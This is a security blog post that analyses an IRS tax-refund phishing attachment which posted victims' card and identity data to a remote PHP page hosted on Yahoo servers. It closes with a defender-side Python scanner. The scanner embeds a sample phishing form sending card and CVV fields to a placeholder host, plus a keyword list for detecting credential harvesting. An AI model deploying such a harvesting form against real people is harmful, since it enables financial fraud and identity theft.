Trying to Clean up Yahoo!
Following immediately on the heels of this past week's abuse of free cloud services such as Yahoo Groups and Google Groups, we walked into work this morning to find a fairly typical IRS tax refund phishing scheme coming through. It made its way into inboxes in an email such as the one below, stating that after their calculations they had realized you were owed a refund of $314.79, and all you had to do was fill out the attached form.
The form itself arrived as an .htm page lightly formatted to look like a .pdf, with the file name payment_form.pdf.htm. It had all of the usual fields to fill out, such as your name, address, credit card number, CVV number, date of birth, mother's maiden name, etc., in other words all of the information the IRS never asks for. The code also had client-side checks that would reject the data if someone tried to enter all 1's in the credit card field, for example. It also included a check against the same entry in an ATM PIN field, which wasn't even included in the form this time around. This shows that this code is being recycled rather than tailored cleanly to each campaign, or perhaps it was sold in a phishing kit whose purchaser didn't know much about the code or how it worked and was just given simple directions on how to get it up and running. Either way, these kinds of errors and leftovers are often seen throughout the criminal cyber world.
After all of the pertinent information was entered into the form and the "Submit" button was clicked, your information would be posted to a remote site by the name of xfilez.biz. More specifically, it was posted to a PHP page at that site called lus.php. I began to get a little curious when the xfilez page turned out to contain analytics JavaScript references located on Yahoo servers. The scripts themselves were hosted at yimg.com and webhosting.yahoo.com, both Yahoo sites. Could it be that, in addition to hosting spam redirects on its Groups pages, Yahoo was also hosting phishing scripts on its very own servers? So I did a lookup on the domain itself, and sure enough:
These were indeed hosted on Yahoo's very own servers. It wasn't looking too good for our buddies at Yahoo!: spam galore, and now phishing attacks too, eek. I will say that as of around 3 pm CST the site was taken down, which is a pretty good response time for them, considering that the spam redirects residing on Yahoo Groups are still very much active after at least 7 days, which is when Troy and I began following them. Perhaps they don't feel spam is worth hurried attention, or there are just way too many of them to find them all. Regardless, it's a good thing the phishing scripts were taken down quickly, and it would be a great thing if Yahoo!, as well as the other major hosting providers, actively continued to find and remove these criminal sites and make it harder for them to appear.
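As an added, defender-side example (not code from this post or from the kit it describes), the script below scans an email attachment for the three tells discussed above: a double extension such as .pdf.htm, a form that posts to a host other than the one the sender claims to be, and input fields collecting card, CVV or mother's-maiden-name data. The sample attachment, the placeholder host phish-host.example and the expected host irs.gov are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment mimicking the kit: an HTML form dressed up
# as a PDF that posts sensitive fields to a third-party host (placeholder).
SAMPLE_HTML = """<html><body><h2>IRS Tax Refund Form</h2>
<form method="post" action="http://phish-host.example/lus.php">
Name <input name="fullname"> Card number <input name="ccnum">
CVV <input name="cvv"> Mother's maiden name <input name="maiden_name">
<input type="submit" value="Submit"></form></body></html>"""

# Substrings in input names that indicate data a tax agency never asks for
SENSITIVE = ("cc", "card", "cvv", "ssn", "pin", "maiden", "dob", "birth")


class FormScanner(HTMLParser):
    """Collect every form action URL and input name in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions, self.inputs = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and a.get("name"):
            self.inputs.append(a["name"].lower())


def score_attachment(filename, html, expected_host=None):
    """Return (score, reasons) for an attachment; higher means more suspicious."""
    reasons = []
    # Double extension such as payment_form.pdf.htm disguising HTML as a document
    if re.search(r"\.(pdf|doc|xls)\.html?$", filename, re.I):
        reasons.append("double extension disguising HTML as a document")
    scanner = FormScanner()
    scanner.feed(html)
    for action in scanner.actions:
        host = urlparse(action).hostname
        if host and host != expected_host:
            reasons.append(f"form posts to external host {host}")
    sens = [n for n in scanner.inputs if any(k in n for k in SENSITIVE)]
    if sens:
        reasons.append("collects sensitive fields: " + ", ".join(sens))
    return len(reasons), reasons


if __name__ == "__main__":
    score, why = score_attachment("payment_form.pdf.htm", SAMPLE_HTML, "irs.gov")
    print(score, *why, sep="\n")
```

Any score above zero is worth quarantining for review; the reasons list gives the analyst the specific tell to cite when reporting the hosting provider, as the post describes doing with Yahoo.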